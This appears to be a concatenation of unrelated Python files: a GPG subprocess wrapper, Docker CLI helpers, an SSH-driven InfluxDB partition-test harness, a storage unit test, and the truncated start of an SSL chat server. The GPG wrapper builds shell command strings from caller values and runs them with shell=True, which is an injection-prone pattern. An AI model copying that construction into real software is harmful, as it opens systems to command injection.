if key in ("USERID_HINT", "NEED_PASSPHRASE", "BAD_PASSPHRASE",
"GOOD_PASSPHRASE", "BEGIN_SIGNING"):
pass
elif key == "SIG_CREATED":
(self.type,
algo, hashalgo, cls,
self.timestamp, self.fingerprint
) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class GPG(object):
decode_errors = 'strict'
result_map = {
'crypt': Crypt,
'delete': DeleteResult,
'generate': GenKey,
'import': ImportResult,
'list': ListKeys,
'sign': Sign,
'verify': Verify,
}
"Encapsulate access to the gpg executable"
def __init__(self, gpgbinary='gpg', gnupghome=None, verbose=False,
use_agent=False, keyring=None):
"""Initialize a GPG process wrapper. Options are:
gpgbinary -- full pathname for GPG binary.
gnupghome -- full pathname to where we can find the public and
private keyrings. Default is whatever gpg defaults to.
keyring -- name of alternative keyring file to use. If specified,
the default keyring is not used.
"""
self.gpgbinary = gpgbinary
self.gnupghome = gnupghome
self.keyring = keyring
self.verbose = verbose
self.use_agent = use_agent
self.encoding = locale.getpreferredencoding()
if self.encoding is None: # This happens on Jython!
self.encoding = sys.stdin.encoding
if gnupghome and not os.path.isdir(self.gnupghome):
os.makedirs(self.gnupghome,0x1C0)
p = self._open_subprocess(["--version"])
result = self.result_map['verify'](self) # any result will do for this
self._collect_output(p, result, stdin=p.stdin)
if p.returncode != 0:
raise ValueError("Error invoking gpg: %s: %s" % (p.returncode,
result.stderr))
def _open_subprocess(self, args, passphrase=False):
# Internal method: open a pipe to a GPG subprocess and return
# the file objects for communicating with it.
cmd = [self.gpgbinary, '--status-fd 2 --no-tty']
if self.gnupghome:
cmd.append('--homedir "%s" ' % self.gnupghome)
if self.keyring:
cmd.append('--no-default-keyring --keyring "%s" ' % self.keyring)
if passphrase:
cmd.append('--batch --passphrase-fd 0')
if self.use_agent:
cmd.append('--use-agent')
cmd.extend(args)
cmd = ' '.join(cmd)
if self.verbose:
print(cmd)
logger.debug("%s", cmd)
return Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def _read_response(self, stream, result):
# Internal method: reads all the stderr output from GPG, taking notice
# only of lines that begin with the magic [GNUPG:] prefix.
#
# Calls methods on the response object for each valid token found,
# with the arg being the remainder of the status line.
lines = []
while True:
line = stream.readline()
if len(line) == 0:
break
lines.append(line)
line = line.rstrip()
if self.verbose:
print(line)
logger.debug("%s", line)
if line[0:9] == '[GNUPG:] ':
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
result.handle_status(keyword, value)
result.stderr = ''.join(lines)
def _read_data(self, stream, result):
# Read the contents of the file from GPG's stdout
chunks = []
while True:
data = stream.read(1024)
if len(data) == 0:
break
logger.debug("chunk: %r" % data[:256])
chunks.append(data)
if _py3k:
# Join using b'' or '', as appropriate
result.data = type(data)().join(chunks)
else:
result.data = ''.join(chunks)
def _collect_output(self, process, result, writer=None, stdin=None):
"""
Drain the subprocesses output streams, writing the collected output
to the result. If a writer thread (writing to the subprocess) is given,
make sure it's joined before returning. If a stdin stream is given,
close it before returning.
"""
stderr = codecs.getreader(self.encoding)(process.stderr)
rr = threading.Thread(target=self._read_response, args=(stderr, result))
rr.setDaemon(True)
logger.debug('stderr reader: %r', rr)
rr.start()
stdout = process.stdout
dr = threading.Thread(target=self._read_data, args=(stdout, result))
dr.setDaemon(True)
logger.debug('stdout reader: %r', dr)
dr.start()
dr.join()
rr.join()
if writer is not None:
writer.join()
process.wait()
if stdin is not None:
try:
stdin.close()
except IOError:
pass
stderr.close()
stdout.close()
def _handle_io(self, args, file, result, passphrase=None, binary=False):
"Handle a call to GPG - pass input data, collect output data"
# Handle a basic data call - pass data to GPG, handle the output
# including status information. Garbage In, Garbage Out :)
p = self._open_subprocess(args, passphrase is not None)
if not binary:
stdin = codecs.getwriter(self.encoding)(p.stdin)
else:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
self._collect_output(p, result, writer, stdin)
return result
#
# SIGNATURE METHODS
#
def sign(self, message, **kwargs):
"""sign message"""
f = _make_binary_stream(message, self.encoding)
result = self.sign_file(f, **kwargs)
f.close()
return result
def sign_file(self, file, keyid=None, passphrase=None, clearsign=True,
detach=False, binary=False):
"""sign file"""
logger.debug("sign_file: %s", file)
if binary:
args = ['-s']
else:
args = ['-sa']
# You can't specify detach-sign and clearsign together: gpg ignores
# the detach-sign in that case.
if detach:
args.append("--detach-sign")
elif clearsign:
args.append("--clearsign")
if keyid:
args.append('--default-key "%s"' % keyid)
result = self.result_map['sign'](self)
#We could use _handle_io here except for the fact that if the
#passphrase is bad, gpg bails and you can't write the message.
p = self._open_subprocess(args, passphrase is not None)
try:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
except IOError:
logging.exception("error writing message")
writer = None
self._collect_output(p, result, writer, stdin)
return result
def verify(self, data):
"""Verify the signature on the contents of the string 'data'
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(Passphrase='foo')
>>> key = gpg.gen_key(input)
>>> assert key
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='bar')
>>> assert not sig
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='foo')
>>> assert sig
>>> verify = gpg.verify(sig.data)
>>> assert verify
"""
f = _make_binary_stream(data, self.encoding)
result = self.verify_file(f)
f.close()
return result
def verify_file(self, file, data_filename=None):
"Verify the signature on the contents of the file-like object 'file'"
logger.debug('verify_file: %r, %r', file, data_filename)
result = self.result_map['verify'](self)
args = ['--verify']
if data_filename is None:
self._handle_io(args, file, result, binary=True)
else:
logger.debug('Handling detached verification')
import tempfile
fd, fn = tempfile.mkstemp(prefix='pygpg')
s = file.read()
file.close()
logger.debug('Wrote to temp file: %r', s)
os.write(fd, s)
os.close(fd)
args.append(fn)
args.append('"%s"' % data_filename)
try:
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
finally:
os.unlink(fn)
return result
#
# KEY MANAGEMENT
#
def import_keys(self, key_data):
""" import the key_data into our keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkey1 = gpg.export_keys(print1)
>>> seckey1 = gpg.export_keys(print1,secret=True)
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> str(gpg.delete_keys(print1))
'Must delete secret key first'
>>> str(gpg.delete_keys(print1,secret=True))
'ok'
>>> str(gpg.delete_keys(print1))
'ok'
>>> str(gpg.delete_keys("nosuchkey"))
'No such key'
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert not print1 in seckeys.fingerprints
>>> assert not print1 in pubkeys.fingerprints
>>> result = gpg.import_keys('foo')
>>> assert not result
>>> result = gpg.import_keys(pubkey1)
>>> pubkeys = gpg.list_keys()
>>> seckeys = gpg.list_keys(secret=True)
>>> assert not print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> result = gpg.import_keys(seckey1)
>>> assert result
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
result = self.result_map['import'](self)
logger.debug('import_keys: %r', key_data[:256])
data = _make_binary_stream(key_data, self.encoding)
self._handle_io(['--import'], data, result, binary=True)
logger.debug('import_keys result: %r', result.__dict__)
data.close()
return result
def recv_keys(self, keyserver, *keyids):
"""Import a key from a keyserver
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> result = gpg.recv_keys('pgp.mit.edu', '3FF0DB166A7476EA')
>>> assert result
"""
result = self.result_map['import'](self)
logger.debug('recv_keys: %r', keyids)
data = _make_binary_stream("", self.encoding)
#data = ""
args = ['--keyserver', keyserver, '--recv-keys']
args.extend(keyids)
self._handle_io(args, data, result, binary=True)
logger.debug('recv_keys result: %r', result.__dict__)
data.close()
return result
def delete_keys(self, fingerprints, secret=False):
which='key'
if secret:
which='secret-key'
if _is_sequence(fingerprints):
fingerprints = ' '.join(fingerprints)
args = ['--batch --delete-%s "%s"' % (which, fingerprints)]
result = self.result_map['delete'](self)
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
return result
def export_keys(self, keyids, secret=False):
"export the indicated keys. 'keyid' is anything gpg accepts"
which=''
if secret:
which='-secret-key'
if _is_sequence(keyids):
keyids = ' '.join(['"%s"' % k for k in keyids])
args = ["--armor --export%s %s" % (which, keyids)]
p = self._open_subprocess(args)
# gpg --export produces no status-fd output; stdout will be
# empty in case of failure
#stdout, stderr = p.communicate()
result = self.result_map['delete'](self) # any result will do
self._collect_output(p, result, stdin=p.stdin)
logger.debug('export_keys result: %r', result.data)
return result.data.decode(self.encoding, self.decode_errors)
def list_keys(self, secret=False):
""" list the keys currently in the keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkeys = gpg.list_keys()
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
which='keys'
if secret:
which='secret-keys'
args = "--list-%s --fixed-list-mode --fingerprint --with-colons" % (which,)
args = [args]
p = self._open_subprocess(args)
# there might be some status thingumy here I should handle... (amk)
# ...nope, unless you care about expired sigs or keys (stevegt)
# Get the response information
result = self.result_map['list'](self)
self._collect_output(p, result, stdin=p.stdin)
lines = result.data.decode(self.encoding,
self.decode_errors).splitlines()
valid_keywords = 'pub uid sec fpr'.split()
for line in lines:
if self.verbose:
print(line)
logger.debug("line: %r", line.rstrip())
if not line:
break
L = line.strip().split(':')
if not L:
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def gen_key(self, input):
"""Generate a key; you might use gen_key_input() to create the
control input.
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> assert result
>>> result = gpg.gen_key('foo')
>>> assert not result
"""
args = ["--gen-key --batch"]
result = self.result_map['generate'](self)
f = _make_binary_stream(input, self.encoding)
self._handle_io(args, f, result, binary=True)
f.close()
return result
def gen_key_input(self, **kwargs):
"""
Generate --gen-key input per gpg doc/DETAILS
"""
parms = {}
for key, val in list(kwargs.items()):
key = key.replace('_','-').title()
parms[key] = val
parms.setdefault('Key-Type','RSA')
parms.setdefault('Key-Length',1024)
parms.setdefault('Name-Real', "Autogenerated Key")
parms.setdefault('Name-Comment', "Generated by gnupg.py")
try:
logname = os.environ['LOGNAME']
except KeyError:
logname = os.environ['USERNAME']
hostname = socket.gethostname()
parms.setdefault('Name-Email', "%s@%s" % (logname.replace(' ', '_'),
hostname))
out = "Key-Type: %s\n" % parms.pop('Key-Type')
for key, val in list(parms.items()):
out += "%s: %s\n" % (key, val)
out += "%commit\n"
return out
# Key-Type: RSA
# Key-Length: 1024
# Name-Real: ISdlink Server on %s
# Name-Comment: Created by %s
# Name-Email: isdlink@%s
# Expire-Date: 0
# %commit
#
#
# Key-Type: DSA
# Key-Length: 1024
# Subkey-Type: ELG-E
# Subkey-Length: 1024
# Name-Real: Joe Tester
# Name-Comment: with stupid passphrase
# Name-Email: joe@foo.bar
# Expire-Date: 0
# Passphrase: abc
# %pubring foo.pub
# %secring foo.sec
# %commit
#
# ENCRYPTION
#
def encrypt_file(self, file, recipients, sign=None,
always_trust=False, passphrase=None,
armor=True, output=None, symmetric=False):
"Encrypt the message read from the file-like object 'file'"
args = ['--encrypt']
if symmetric:
args = ['--symmetric']
else:
args = ['--encrypt']
if not _is_sequence(recipients):
recipients = (recipients,)
for recipient in recipients:
args.append('--recipient "%s"' % recipient)
if armor: # create ascii-armored output - set to False for binary output
args.append('--armor')
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output "%s"' % output)
if sign:
args.append('--sign --default-key "%s"' % sign)
if always_trust:
args.append("--always-trust")
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase=passphrase, binary=True)
logger.debug('encrypt result: %r', result.data)
return result
def encrypt(self, data, recipients, **kwargs):
"""Encrypt the message contained in the string 'data'
>>> import shutil
>>> if os.path.exists("keys"):
... shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> result = gpg.encrypt("hello",print2)
>>> message = str(result)
>>> assert message != 'hello'
>>> result = gpg.decrypt(message)
>>> assert result
>>> str(result)
'hello'
>>> result = gpg.encrypt("hello again",print1)
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status == 'need passphrase'
True
>>> result = gpg.decrypt(message,passphrase='bar')
>>> result.status in ('decryption failed', 'bad passphrase')
True
>>> assert not result
>>> result = gpg.decrypt(message,passphrase='foo')
>>> result.status == 'decryption ok'
True
>>> str(result)
'hello again'
>>> result = gpg.encrypt("signed hello",print2,sign=print1)
>>> result.status == 'need passphrase'
True
>>> result = gpg.encrypt("signed hello",print2,sign=print1,passphrase='foo')
>>> result.status == 'encryption ok'
True
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status == 'decryption ok'
True
>>> assert result.fingerprint == print1
"""
data = _make_binary_stream(data, self.encoding)
result = self.encrypt_file(data, recipients, **kwargs)
data.close()
return result
def decrypt(self, message, **kwargs):
data = _make_binary_stream(message, self.encoding)
result = self.decrypt_file(data, **kwargs)
data.close()
return result
def decrypt_file(self, file, always_trust=False, passphrase=None,
output=None):
args = ["--decrypt"]
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output "%s"' % output)
if always_trust:
args.append("--always-trust")
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase, binary=True)
logger.debug('decrypt result: %r', result.data)
return result
|
utils.py
|
import subprocess
import warnings
from pathlib import Path
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
from typing import Any, Dict, Iterable, List, Optional, Tuple, Union
import pydantic
from python_on_whales.download_binaries import download_buildx
PROJECT_ROOT = Path(__file__).parents[1]
def title_if_necessary(string: str):
if string.isupper():
return string
else:
return string.title()
def to_docker_camel(string):
try:
special_cases = {
"exec_ids": "ExecIDs",
"sandbox_id": "SandboxID",
"oom_killed": "OOMKilled",
"rw": "RW",
"link_local_ipv6_address": "LinkLocalIPv6Address",
"link_local_ipv6_prefix_lenght": "LinkLocalIPv6PrefixLen",
"secondary_ipv6_addresses": "SecondaryIPv6Addresses",
"endpoint_id": "EndpointID",
"global_ipv6_prefix_lenght": "GlobalIPv6PrefixLen",
"ip_adress": "IPAddress",
"ip_prefix_lenght": "IPPrefixLen",
"ipv6_gateway": "IPv6Gateway",
"network_id": "NetworkID",
"ip_address": "IPAddress",
"global_ipv6_address": "GlobalIPv6Address",
"blkio_device_read_iops": "BlkioDeviceReadIOps",
"blkio_device_write_iops": "BlkioDeviceWriteIOps",
"device_ids": "DeviceIDs",
"kernel_memory_tcp": "KernelMemoryTCP",
"container_id_file": "ContainerIDFile",
"uts_mode": "UTSMode",
"root_fs": "RootFS",
"enable_ipv6": "EnableIPv6",
"ipv4_address": "IPv4Address",
"ipv6_address": "IPv6Address",
"ipam": "IPAM",
"tls_info": "TLSInfo",
"virtual_ips": "VirtualIPs",
}
return special_cases[string]
except KeyError:
return "".join(title_if_necessary(x) for x in string.split("_"))
class DockerCamelModel(pydantic.BaseModel):
class Config:
alias_generator = to_docker_camel
allow_population_by_field_name = True
class DockerException(Exception):
def __init__(
self,
command_launched: List[str],
return_code: int,
stdout: Optional[bytes] = None,
stderr: Optional[bytes] = None,
):
command_launched_str = " ".join(command_launched)
error_msg = (
f"The docker command executed was `{command_launched_str}`.\n"
f"It returned with code {return_code}\n"
)
if stdout is not None:
error_msg += f"The content of stdout is '{stdout.decode()}'\n"
else:
error_msg += (
"The content of stdout can be found above the "
"stacktrace (it wasn't captured).\n"
)
if stderr is not None:
error_msg += f"The content of stderr is '{stderr.decode()}'\n"
else:
error_msg += (
"The content of stderr can be found above the "
"stacktrace (it wasn't captured)."
)
super().__init__(error_msg)
def run(
args: List[Any],
capture_stdout: bool = True,
capture_stderr: bool = True,
input: bytes = None,
return_stderr: bool = False,
env: Dict[str, str] = {},
) -> Union[str, Tuple[str, str]]:
args = [str(x) for x in args]
if args[1] == "buildx":
install_buildx_if_needed(args[0])
env["DOCKER_CLI_EXPERIMENTAL"] = "enabled"
if env == {}:
env = None
if capture_stdout:
stdout_dest = subprocess.PIPE
else:
stdout_dest = None
if capture_stderr:
stderr_dest = subprocess.PIPE
else:
stderr_dest = None
completed_process = subprocess.run(
args, input=input, stdout=stdout_dest, stderr=stderr_dest, env=env
)
if completed_process.returncode != 0:
raise DockerException(
args,
completed_process.returncode,
completed_process.stdout,
completed_process.stderr,
)
if return_stderr:
return (
post_process_stream(completed_process.stdout),
post_process_stream(completed_process.stderr),
)
else:
return post_process_stream(completed_process.stdout)
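# Hedged usage sketch for run() (comments only): the docker commands shown are
# illustrative and assume a docker CLI is available on PATH.
#
#     version = run(["docker", "version", "--format", "{{.Client.Version}}"])
#     out, err = run(["docker", "info"], return_stderr=True)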
def post_process_stream(stream: Optional[bytes]):
if stream is None:
return ""
stream = stream.decode()
if len(stream) != 0 and stream[-1] == "\n":
stream = stream[:-1]
return stream
ValidPath = Union[str, Path]
def to_list(x) -> list:
if isinstance(x, list):
return x
else:
return [x]
# backport of https://docs.python.org/3.9/library/stdtypes.html#str.removesuffix
def removesuffix(string: str, suffix: str) -> str:
if string.endswith(suffix):
return string[: -len(suffix)]
else:
return string
def removeprefix(string: str, prefix: str) -> str:
if string.startswith(prefix):
return string[len(prefix) :]
else:
return string
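# Quick sanity examples for the backports above (comments only):
#
#     removesuffix("my_container_id", "_id")    # -> "my_container"
#     removesuffix("my_container", "_id")       # -> "my_container" (unchanged)
#     removeprefix("sha256:abcdef", "sha256:")  # -> "abcdef"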
def install_buildx_if_needed(docker_binary: str):
completed_process = subprocess.run(
[docker_binary, "buildx"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={"DOCKER_CLI_EXPERIMENTAL": "enabled"},
)
if completed_process.returncode == 0:
return
stderr = completed_process.stderr.decode()
if "is not a docker command" in stderr:
warnings.warn(
"It seems that docker buildx is not installed on your system. \n"
"It's going to be downloaded for you. It's only a one time thing."
"The next calls to the buildx command won't trigger the "
"download again."
)
download_buildx()
else:
raise RuntimeError(
f"It seems buildx is not properly installed. When running "
f"'docker buildx', here is the result:\n"
f"{stderr}"
)
def reader(pipe, pipe_name, queue):
try:
with pipe:
for line in iter(pipe.readline, b""):
queue.put((pipe_name, line))
finally:
queue.put(None)
def stream_stdout_and_stderr(full_cmd: list) -> Iterable[Tuple[str, bytes]]:
full_cmd = list(map(str, full_cmd))
process = Popen(full_cmd, stdout=PIPE, stderr=PIPE)
q = Queue()
full_stderr = b"" # for the error message
Thread(target=reader, args=[process.stdout, "stdout", q]).start()
Thread(target=reader, args=[process.stderr, "stderr", q]).start()
for _ in range(2):
for source, line in iter(q.get, None):
yield source, line
if source == "stderr":
full_stderr += line
exit_code = process.wait()
if exit_code != 0:
raise DockerException(full_cmd, exit_code, stderr=full_stderr)
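# Hedged usage sketch for stream_stdout_and_stderr (comments only): the command
# is illustrative and assumes a docker CLI is available on PATH. Each yielded
# line is raw bytes tagged with the stream it came from.
#
#     for source, line in stream_stdout_and_stderr(["docker", "pull", "ubuntu"]):
#         print(source, line.decode(errors="replace"), end="")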
def format_dict_for_cli(dictionary: Dict[str, str], separator="="):
return [f"{key}{separator}{value}" for key, value in dictionary.items()]
def read_env_file(env_file: Path) -> Dict[str, str]:
result_dict = {}
for line in env_file.read_text().splitlines():
line = line.strip()
try:
first_sharp = line.index("#")
except ValueError:
pass
else:
line = line[:first_sharp]
if not line:
continue
line = line.strip()
key, value = line.split("=", 1)
result_dict[key] = value
return result_dict
def read_env_files(env_files: List[Path]) -> Dict[str, str]:
result_dict = {}
for file in env_files:
result_dict.update(read_env_file(file))
return result_dict
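# Hedged example of the env-file helpers above (comments only); the file content
# is illustrative. Given a file containing:
#
#     # database settings
#     DB_HOST=localhost
#     DB_PORT=5432
#
# read_env_file(Path("example.env")) returns
# {"DB_HOST": "localhost", "DB_PORT": "5432"}: text after the first '#' is
# dropped, blank lines are skipped, and each remaining line is split on the
# first '='.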
|
influxenv.py
|
import time
import spur
import json
import logging
import pycurl
import threading
from StringIO import StringIO
errorRetry = 50
numThreads = 20
testDelayAdder = 10
class InfluxEnv(object):
def __init__(self,ip1,ip2,ip3,username,password,pem):
self.errorRetry = errorRetry
self.numThreads = numThreads
self.testDelayAdder = testDelayAdder
self.ip = [ "", ip1, ip2, ip3 ]
if username is None:
self.username = ""
else:
self.username = username
if password is None:
self.password = ""
else:
self.password = password
if pem is None:
self.pem = ""
else:
self.pem = pem
self.datetime = time.strftime("%Y_%m_%dT%H_%M_%S", time.gmtime())
self.db = 'run_' + self.datetime
logging.basicConfig(filename='/tmp/'+self.db,level=logging.INFO)
logging.info(self.db)
logging.info("")
def testLogBanner(self,test_name):
logging.info("")
logging.info("Test: "+test_name)
logging.info("----------------------------------------------------------------------------------------")
logging.info("")
def executeCommand(self,node,command,pause):
logging.info("executeCommand")
logging.info("Node: "+str(node))
logging.info(command)
result_text = ""
try:
if len(self.password) > 0:
shell = spur.SshShell(hostname=self.ip[node],username=self.username,password=self.password)
else:
shell = spur.SshShell(hostname=self.ip[node],username=self.username,private_key_file=self.pem)
with shell:
result = shell.run(command)
result_text = result.output
#print result.output
except spur.results.RunProcessError:
pass
logging.info("Result:"+result_text)
time.sleep(pause+self.testDelayAdder)
return result_text
def stopInflux(self,node):
logging.info("stopInflux")
self.executeCommand(node,["sudo","service","influxdb","stop"],2)
def startInflux(self,node):
logging.info("startInflux")
self.executeCommand(node,["sudo","service","influxdb","start"],8)
def killInflux(self,node):
logging.info("killInflux")
self.executeCommand(node,["sudo","pkill","influxdb"],1)
def createDB(self):
logging.info("createDB")
self.executeCommand(1,["sh","-c",'curl -G http://localhost:8086/query --data-urlencode "q=CREATE DATABASE ' + self.db + '"'],0)
self.executeCommand(1,["sh","-c",'curl -G http://localhost:8086/query?pretty=true --data-urlencode "q=CREATE RETENTION POLICY mypolicy ON ' + self.db + ' DURATION 90d REPLICATION 3 DEFAULT"'],0)
print "DB Name:", self.db
def allPartitionStart(self):
        for n in range(1,4):
self.partitionStart(n)
def partitionStart(self,node):
self.executeCommand(node,["sudo","ufw","allow","22"],2)
self.executeCommand(node,["sh","-c","echo y | sudo ufw enable"],2)
def allPartitionStop(self):
        for n in range(1,4):
self.partitionStop(n)
def partitionStop(self,node):
self.executeCommand(node,["sh","-c","echo y | sudo ufw reset"],2)
def fullyPartitionNode(self,node):
#This fully partitions a node away from everything
self.executeCommand(node,["sudo","ufw","deny","8086"],2)
self.executeCommand(node,["sudo","ufw","deny","out","8086"],2)
def singlePartitionNode(self,node1,node2):
#This is just between 2 nodes, not from everything
self.executeCommand(node1,["sudo","ufw","deny","from",self.ip[node2],"to","any","port","8086"],2)
self.executeCommand(node1,["sudo","ufw","deny","out","from",self.ip[node2],"to","any","port","8086"],2)
def unidirectionalSinglePartitionNode(self,node1,node2):
#This is just between 2 nodes, not from everything; unidirectional, node1 cannot receive from node2
self.executeCommand(node1,["sudo","ufw","deny","from",self.ip[node2],"to","any","port","8086"],2)
def sendSingleMetric(self,node,tsname,value):
logging.info("sendSingleMetric")
for i in range(0,self.errorRetry):
result = self.executeCommand(node,["sh","-c",'curl -X POST http://localhost:8086/write -d \' { "database": "' + self.db + '", "retentionPolicy": "mypolicy", "points": [ { "name": "' + tsname + '", "fields": { "value": ' + str(value) + ' } } ] }\''],2)
if result.find("error") != -1:
time.sleep(10)
continue
break
def sendMultipleMetricsThread(self,url,payload,count):
for i in range(0,count):
for j in range(0,self.errorRetry):
cbuffer = StringIO()
c = pycurl.Curl()
c.setopt(pycurl.URL,url )
c.setopt(pycurl.HTTPHEADER, ['X-Postmark-Server-Token: API_TOKEN_HERE','Accept: application/json'])
c.setopt(pycurl.POST, 1)
c.setopt(c.WRITEDATA, cbuffer)
c.setopt(pycurl.POSTFIELDS, payload)
c.perform()
# if len(cbuffer.getvalue()) >0: print buffer.getvalue()
c.close()
if cbuffer.getvalue().find("error") != -1:
# logging.info("sendMultipleMetricsThread: Error Retry "+j)
if j >= self.errorRetry - 1:
logging.info("sendMultipleMetricsThread: Max Error Retry Failure")
time.sleep(1)
continue
break
def sendMultipleMetrics(self,node,tsname,count):
logging.info("sendMultipleMetrics")
payload = '{ "database": "' + self.db + '", "retentionPolicy": "mypolicy", "points": [ { "name": "' + tsname + '", "fields": { "value": -1 }}]}'
url = 'http://' + self.ip[node] + ':8086/write'
countForThread = int(count / self.numThreads)
threadList = []
for i in range(0,self.numThreads):
t = threading.Thread(target=self.sendMultipleMetricsThread, args=(url,payload,countForThread))
t.start()
threadList.append(t)
for t in threadList:
t.join()
def listMetrics(self,node,tsname):
logging.info("listMetrics")
return self.executeCommand(node,["sh","-c",'curl -G http://localhost:8086/query?pretty=true --data-urlencode "db=' + self.db + '" --data-urlencode "q=SELECT * FROM ' + tsname + '"'],0)
def countMetrics(self,node,tsname):
logging.info("countMetrics")
for i in range(0,self.errorRetry):
result = self.executeCommand(node,["sh","-c",'curl -G http://localhost:8086/query?pretty=true --data-urlencode "db=' + self.db + '" --data-urlencode "q=SELECT count(value) FROM ' + tsname + '"'],0)
if result.find("error") != -1:
time.sleep(10)
continue
j = json.loads(result)
return j['results'][0]['series'][0]['values'][0][1]
return -1 #bogus count value to indicate error
# def copyFile(self,node,filename):
# shell = spur.SshShell(hostname=self.ip[node],username=self.username,private_key_file=self.pem)
# with shell.open("/tmp","r") as remote_file
# with open(".","w") as local_file
# shutil.copyfileobj(remote_file,local_file)
# pass
def printDebug(self):
print self.ip[1],self.ip[2],self.ip[3],self.username,self.password,self.pem
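# Usage sketch (hypothetical IPs, credentials and series name; assumes InfluxDB
# listening on port 8086 and passwordless sudo on every node):
#
#   env = InfluxEnv("10.0.0.1", "10.0.0.2", "10.0.0.3", "ubuntu", None, "key.pem")
#   env.createDB()
#   env.sendSingleMetric(1, "cpu_load", 42)
#   print env.countMetrics(1, "cpu_load")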
|
test_core.py
|
#
# SensApp::Storage
#
# Copyright (C) 2018 SINTEF Digital
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
#
from unittest import TestCase
from mock import MagicMock
from threading import Thread
from storage.settings import Settings, Command
from storage.ui import UI
from storage.core import Storage
from storage.sensapp import Registry
from tests.fakes import FakeQueueFactory, FakeDBFactory
class StorageTests(TestCase):
def setUp(self):
self._settings = Settings.defaults()
self._ui = MagicMock(UI)
self._queue_factory = FakeQueueFactory()
self._db_factory = FakeDBFactory()
self._registry = MagicMock()
self._storage = Storage(settings=self._settings,
ui=self._ui,
queue=self._queue_factory,
db=self._db_factory,
registry=lambda *args, **kwargs: self._registry)
self._consumer = None
def test_calls_db_when_sensor_is_known(self):
self._registry.knows = MagicMock(return_value=True)
self._start_storage()
self._send_request(b"[ { \"measurement\": \"sensor_3\" } ]")
self._stop_queue()
self.assertEqual(self._db_factory.db.store.call_count, 1)
self.assertEqual(self._registry.knows.call_count, 1)
def test_do_not_call_db_when_sensor_is_not_known(self):
self._registry.knows = MagicMock(return_value=False)
self._start_storage()
self._send_request(b"[ { \"measurement\": \"sensor_3\" } ]")
self._stop_queue()
self.assertEqual(self._db_factory.db.store.call_count, 0)
self.assertEqual(self._registry.knows.call_count, 1)
def _start_storage(self):
def do_start():
self._storage.store()
self._consumer = Thread(target=do_start)
self._consumer.start()
def _send_request(self, body):
from time import sleep
#print("Sending ", body, "...")
sleep(1)
self._queue_factory.queue.accept_task(body)
def _stop_queue(self):
self._queue_factory.queue.stop()
self._consumer.join()
|
servidor.py
|
import ssl
from ssl import SSLSocket
import threading
import socket
from client import client
from database import *
from private_message import *
#import functools as fun
#import asyncio
host = '192.168.2.26'
port = 4004
clients = []
online_client_sockets: list[SSLSocket] = []
def broadcast(client_sender:client,message:str) -> None:
try:
message_with_sign = message + ".__." + client_sender.sign_key()
#print(message_with_sign)
for cliente in clients:
if cliente.name != client_sender.name:
cliente.send_message(("globalMSG"+client_sender.name + " -> " + message_with_sign).encode())
except Exception as e:
print(e.args)
# Function to handle clients' connections
def handle_client(client:SSLSocket) -> None:
while True:
try:
message = client.recv(1024).decode()
if parseInput(message,client):
raise Exception("Fim de conversa")
except Exception as e:
print(e.args)
for client_inside in clients:
if client_inside.socket_info == client:
clients.remove(client_inside)
break
client.close()
#print(list(map(lambda x : "nome->: "+ x.name ,clients)))
break
def parseInput(message:str,client_socket:SSLSocket) -> bool:
try:
client_user:client = None
#print(f"conteudo: {message}")
if message.find("register") != -1:
#print("REGISTO")
#print(message)
create_user_db(message.removeprefix("register"),client_socket)
return False
elif message.find("login") != -1:
client_user:client = login_client(message,client_socket)
lock = threading.Lock()
lock.acquire()
for cl in clients:
# print(cl.name)
if cl.name == client_user.name:
lock.release()
return False
